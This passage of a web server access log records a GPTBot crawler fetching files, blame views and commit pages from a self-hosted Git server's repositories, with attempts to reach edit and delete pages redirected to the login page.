+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 10984] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" -[17/Feb/2026:17:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 44945749] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" -[17/Feb/2026:17:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 16821] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" -[17/Feb/2026:17:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 11051] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:17:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13221] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10515] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 9801] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:17:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:17:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:17:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10777] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:17:21:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" -[17/Feb/2026:17:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/assetpilot.ico" -[17/Feb/2026:17:21:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" -[17/Feb/2026:17:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/assetpilot.ico" -[17/Feb/2026:17:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" -[17/Feb/2026:17:21:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:21:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:21:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:21:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:21:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:21:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" -[17/Feb/2026:17:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/files.zip" -[17/Feb/2026:17:21:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:21:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" -[17/Feb/2026:17:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/files.zip" -[17/Feb/2026:17:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" -[17/Feb/2026:17:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 17664] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 9816] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" -[17/Feb/2026:17:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" -[17/Feb/2026:17:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" -[17/Feb/2026:17:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 84370] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" -[17/Feb/2026:17:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 11103] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" -[17/Feb/2026:17:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10777] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:17:21:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:21:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:21:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:21:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" -[17/Feb/2026:17:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build" -[17/Feb/2026:17:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10988] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15014] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13847] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13848] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:17:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20164] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 